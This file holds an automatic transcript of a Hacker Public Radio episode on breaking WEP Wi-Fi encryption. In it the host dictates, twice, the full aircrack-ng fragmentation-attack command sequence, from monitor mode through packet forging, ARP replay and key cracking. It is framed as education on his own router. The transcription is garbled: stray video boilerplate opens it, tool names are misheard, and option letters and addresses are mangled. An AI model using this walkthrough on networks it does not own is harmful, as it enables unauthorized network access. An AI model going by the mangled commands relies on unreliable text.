Files
hpr-knowledge-base/hpr_transcripts/hpr0161.txt
Lee Hanken 7c8efd2228 Initial commit: HPR Knowledge Base MCP Server
- MCP server with stdio transport for local use
- Search episodes, transcripts, hosts, and series
- 4,511 episodes with metadata and transcripts
- Data loader with in-memory JSON storage

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
2025-10-26 10:54:13 +00:00

204 lines
16 KiB
Plaintext

Episode: 161
Title: HPR0161: Hacking WEP
Source: https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr0161/hpr0161.mp3
Transcribed: 2025-10-07 12:35:41
---
Subscribe to this channel.
Subscribe!
If you are free, click on the bell.
Thanks for to watch.
See you in the next videos!
Well hello, welcome to PR listness. This is Finix's student hackers guy Tillinix and surprise
surprise I'm your host Finix. Today I want to talk about the fragmentation attack used
for hacking web basically. Before I start off, there's a couple of things that I'd like
to quickly mention. First and foremost, I'm actually recording this slightly different
from the way that I normally record episodes like this. Normally I write a script and a
sort of script and I kind of stick around there and work with that. However, this time
I've kind of decided to just record and talk about it. Obviously if you like the way
that I used to do things, please drop us online. If I like the way that I used to do things,
I'll go back to the other way as well. So this is just kind of like a little experiment.
Hopefully it will be a bit better, but maybe not. I'd also like to take this opportunity
to apologise to Enigma and to you guys at HPR as well. I was booked into to release an
episode on 31st of July. However, I've started a new job and I also came down with a pretty
pretty tough viral infection. It's kind of had me pretty way laid for the past two weeks.
So if a coffin sneeze all the way through there, you'll know why. But I'm hoping that
this episode will go a long way to getting you guys to forgive me anyway. So that's kind
of the stuff I wanted to get out of the way first. So let's get onto the meat and potatoes
of what I'm talking about today. I've been very interested in WEP for quite some time.
The numbers of reasons why. I mean the reason that I do a lot of looking at WEP is that an awful
lot of people still use WEP, which always surprises me because the vulnerabilities in WEP
are not unknown. This is very well documented issues in WEP and have been quite some time.
However, there's still organisations and there's still businesses that are using it. And
it's a very, very vulnerable technology to say the least. The fragmentation attack came
around in about 2007. I don't really want to get overly technical about it. What I really
want to do is just kind of run through the attacks so that you guys can see how it works.
And then I'm going to release some sort of show notes over at the Linux Society. And
I'll give you the URL for that later on probably at the end. And in there, I'll put lists
of stuff that I refer to and packages that you'll need to install and maybe just a demo
of it. But what the fragmentation attack does is basically, I'll put some light on what
I was doing earlier on today with it. I set up a wireless network with a 128-bit random
WEP key. I then used a fragmentation attack to basically hack the wireless network. There
was no clients attached to the wireless network and I managed to produce the WEP key in less
than four minutes. I think it was about three minutes, 52 seconds if you're being precise.
And that's for 128-bit. When I did the same test on 64-bit, it took less than a minute.
By the time the package had loaded up, it told me what the key was. The big kind of indicators
here is that you don't need any clients attached to the wireless network. Some of you guys
that may have experienced in WEP hacking, maybe use the concept of needing to have people
associated with the wireless network to generate traffic to collect weak IVs that way. Well,
what this attack does is takes that whole need to have clients out. And what you do is you're
able to produce the traffic. And because you're able to produce the traffic, you're able
to get as many IVs as you need. Why I really kind of wanted to show light on this attack
is the reality of it is now when a hacker finds a wireless network that hands WEP encryption.
There isn't a real time deterrent for them anymore. I have to be honest with you. I mean,
the reason that WEP was used is that a vulnerability isn't WEP well known before it became popular.
But the argument was is that it would still be time consuming for a hacker to basically
hack WEP and that they would move to an open network. Well, the reality of this attack
now is this is not a question if the hacker can get onto the network. But more of a question
of it will take me five minutes until I get online. And that's pretty ill that that that's
no real deterrent. I'll have to dig up the paper, but I believe the Janet, which is the joint
academic network. Basically, it's kind of like an academic ISP in the UK. I have dropped
WEP. They don't recommend it. However, there is still UK ISPs that are sending out boxes
routers basically with 64-bit WEP encryption and they're sending these out to businesses and to
home. So I can't mention any names for obvious reasons. But yeah, this technology is this antiquated
technology that's causing problems that's very easy to crack is being shipped out left, right,
and centre. And the real issue with this is that it's a full sense of security that we're
offering people. They're not the sitting there thinking that the wireless network is secured.
And hopefully by the end of this episode today, I'll show you that it's far from being secured.
But yeah, I'm going to stop rambling and I suppose it's time to get onto the meeting potatoes
of what I'm actually going to talk about today. Okay, I suppose the next thing I need to do is do the
technology kind of health warnings and sort of disclaim a bit. Obviously I'm doing this for
educational purposes. I don't condone you hacking anyone's network. I don't promote it. If you go
and hack someone's wireless network and you don't have permission to do it and you get caught,
you're on your own. At the end of the day, this is purely for demonstration purposes.
Also, I'm not going to go through every possible combination of how you can do this.
The technology, the platform that I used today to do this hack is I use the Tripoli.
I've got a Ubuntu Tripoli running on there. Very nice. I must admit my commands are for that.
There is a distro called Backtrack 3. I'm sure most of you guys know it.
That has all the tools that you could possibly need to do this sort of attack on as well.
There's lots of options, but it's basically your prerogative to match your configurations to mine.
I suppose what we need to do now is get on with hacking a wireless network.
Some of the packages that you're going to need for this is going to be M on NG,
AirPlayNG, and PacketForgeNG and AircrackNG. You should be able to get most of these packages
through repository or download and compile from source. It should be pretty easy.
What I did just to give you a rough idea is I got a separate wireless router
so that I wasn't interfering with anyone's network and I set this up to be
called Finix Wireless Network, very originally I know. I then went to a website that generates random
keys and I generated a random 128 bit key and then used that.
Now before I start it's probably well worth mentioning that there's an absolute ton of video how
to guides that are probably going to do a job a lot better than I am. But if you just go on to
YouTube and do a search for web fragmentation attack there's tons and tons of really really good
how to guides on this. Like I said before this is not an undocumented hack by any imagination.
One that I saw that I thought was a very, very clever and often you find these clever things
are normally the simplest things. In this attack you need to call the MAC address of the AP
quite a bit. You need to call the MAC address of your wireless card quite a bit. What he did
right at the beginning of the attack was put in export space AP equals and then the MAC address
of the AP and then export the export space Wi-Fi equals and then the MAC address of his wireless card.
Which to be honest with you later on will make a lot more sense but what he then does
is in the commands he's able to call the variable which is a lot easier having to constantly
type in MAC address so I can tell you that for nothing. Some of the packages that you,
what the packages you are going to need you should find them in most packet repositories,
packet managers and you'll be able to go to the websites and stuff like that. There's a package
called Hermann-NG. You'll definitely need that. You'll definitely need AirPlay-NG.
You're definitely going to need a packet called packetforge-NG as well and I think you're going
to need to get a copy of AerodompNG and Aircrack as well. But anyway what I'll do is I'll go through
the commands that I've used and what I'll do is I'm just going to refer to AP when I'm meaning the
I'm going to say variable AP when I'm actually meaning the MAC address of the AP point and I'm
going to say variable Wi-Fi when I'm meaning the MAC address of the wireless card. I know this
sounds a little bit confusing but I'll try and write it on the show now so I'll make a lot more
sense. The first command, these are all root commands but because I've been using the bunto
they've all got pseudo before it. But like I say, these are work fine in a root terminal.
The first one I used was pseudo Hermann-NG start Wi-Fi 0 and what that did was that
cut that call there a month to start on. Basically my wireless card which is Wi-Fi 0. I used
pseudo while I'm config at 0, 80, 80, destroyed. I just got rid of anything in the at 0 section.
I did pseudo IF config at 1 up and at 1 is the device that I'm using for the hack.
The next one is pseudo IW config at 1 mode monitor channel 13. What this does is puts your card
into basically a promiscuous mode. The AP that I wanted to hack happened to be on channel 13.
I'm lucky for some. Next command, this is a bit of a mouthful so what it is is pseudo Airplay-NG
space-1, space-0, space-e and in here you want to put in the wireless networks name. So in my
case it's Phenix wireless network, space-a and in here you want to put the AP of the MAC address of
the AP. So what you would be able to do, variable AP if you did what I said earlier on.
Otherwise just paste in the MAC address of the one that you want to tack, space-h,
space. This will be your MAC address of your wireless card so if you declared that variable
it would have been dollar sign Wi-Fi, space-ath-1. So just kind of read that back without all the
stopping and starting. It's basically pseudo Airplay-NG space-i, space-0, space-e,
Phenix wireless network, space-a, space dollar sign AP, space-h, space dollar sign Wi-Fi, space-ath-1.
The next command that you want to use is pseudo Airplay-NG. So that pseudo Airplay-NG space-5,
space-b, dollar sign AP, space-h, space dollar sign Wi-Fi, space-ath-1. So basically that
is the pseudo Airplay-NG, dash 5, space-b, the MAC address of your AP so if you declared that variable
again this is this is why I said at the beginning it's well worth doing declaring that variable
because you just spend your lifetime putting these back in again. So pseudo Airplay, space-5,
space-b, space dollar sign AP, space-h, dollar sign Wi-Fi, space-ath-1. The next package that you
going to use is a package called packetforge-NG. Now this command is a bit of a mouthful so
what you'll find from the first command is that you get a package called fragment- whatever the
date of when you did it whatever the time was.xor and you'll be calling this the next command which
is there's no need for pseudo on this but it's packetforge-NG
space-0, space-a, space dollar sign AP, space-h, space dollar sign Wi-Fi, space-k, space-255,
255.255.255 space dash l space 255.255.255.255 space dash y the fragmentation
file.xor space dash w space up dash request okay so that's packet forge
space dash o space dash a the BSS ID MAC address dash h the MAC address of your
wireless card dash k space 255.255.255.255.255.255 space dash l space 255.255.255.255.255.
space dash y fragmentation file.xor space dash w up request okay what I'll do is
that'll forge a basically an up request okay the next command that you want
to run is pseudo arrow dump dash ng space dash c space 13 because that's
the the channel that I'm on space double dash BSS ID space dollar sign AP
space dash w space capture space at one okay what that'll do is that'll open up
terminal well that does that that that needs to run the background so what you
need once you've got that command or what you need to do now is moving to
another terminal make sure that you're certainly in there the working
directory where that art request that you use package for just for okay I'm
not a new terminal and it'll be pseudo airplay dash ng space dash two space dash r
space art request at one that's art dash request that's the file that we made
with packet forge okay and you need to leave that money in its own terminal and
then what you need to do is open up one more terminal and type in pseudo space
aircrack dash ng space dash z space star dot cap space dash said and what
this'll do is this all low dot everything that ends dot cap that you've been
making the past and it'll start running its attack against them and the great
great thing about this is is that this can run while you're collecting AVs okay
so what you should be left off with now is you should be left with three
terminal windows open okay one sending this forged art request one
monitoring the the downloads and collecting them and the other one cracking the
IVs okay and that's it that's it in a nutshell you should get a screen if
you're cracking 128 bit it'll probably take a couple of minutes if you're cracking
64 bit you should probably get a response pretty much within a minute and what
I will do is it will tell you that it's found the key and from there it'll
give you the hex that the hex for the the web or the uski as well okay so
quick run through those commands again okay is is first like you say my
recommendation is to put some variables at the beginning this so so like I say
it's probably best of the clear the variables now so export space AP equals
and then put the MAC address of the AP point there okay the next one would be
export space Wi-Fi equals the MAC address of your wireless card okay the
commands are as followed it's pseudo m on dash ng start Wi-Fi zero the next one is
pseudo while while I'm config space at zero destroy next one is pseudo IF
config at one up the next one is pseudo IW config at one mode monitor channel
13 the next one will be pseudo airplay dash ng space dash i space o space dash e
space phoenix wireless network in your case the wireless network that you're
packing dash a space dollar sign AP space dash h space dollar sign Wi-Fi space
at one okay next command pseudo airplay dash ng space dash 5 space dash b space
dollar sign AP space dash h space dollar sign Wi-Fi space at one okay the next one
is to use the packet forge program so like I say unless you need packet
forge dash ng space dash zero space dash a space dollar sign AP space dash h
space dollar sign Wi-Fi space dash k space okay 255.255.255.255.255.255.
space dash l space 255.255.255.255.255.255 space dash Y space fragmentation
file that you've made dot dot XOR space dash W space up dash request okay the next
command you need is pseudo aerodomp dash ng space dash c space channel 13
this is just the number of the don't type channel 13 just have pseudo aerodomp dash ng space
dash c space 13 space dash dash bss id space dollar sign AP space dash W space capture space
at one okay then you'll need to open up another terminal window and leave that running in there
and then in this one it would be say pseudo airplay dash ng space dash two dash r
up dash request at one so pseudo airplay dash ng space dash dash two space dash r space
up dash request space at one leave that running out another terminal window and then if you
type in the pseudo air crack dash ng space dash z space star dot cap space dash z and actually
crack your ivies for you well as promised there's some show notes to go along with this
podcast you can find it our website which is www.thelinuxsociety.org.uk that's www.thelinuxsociety.org.uk
and if you just go there and look for my blog it should be Finix's blog you'll find basically
a quick guide of how I did this any links or anything like that that I thought were interesting
all of that sort of stuff and that kind of brings us to the end I hope you've enjoyed it and
you know you've learned a little bit about how insecure web actually is
before I go I would just like to do a quick shout out to my pal Chad Wallenberg over at the
Linux basement a very cool Linux podcast I started off doing these things for him over there so
I'm here today thanks to to the Linux basement so a big shout out to you dude and keep on rocking
with those songs all right anyway thanks very much for listening guys and a little good night
you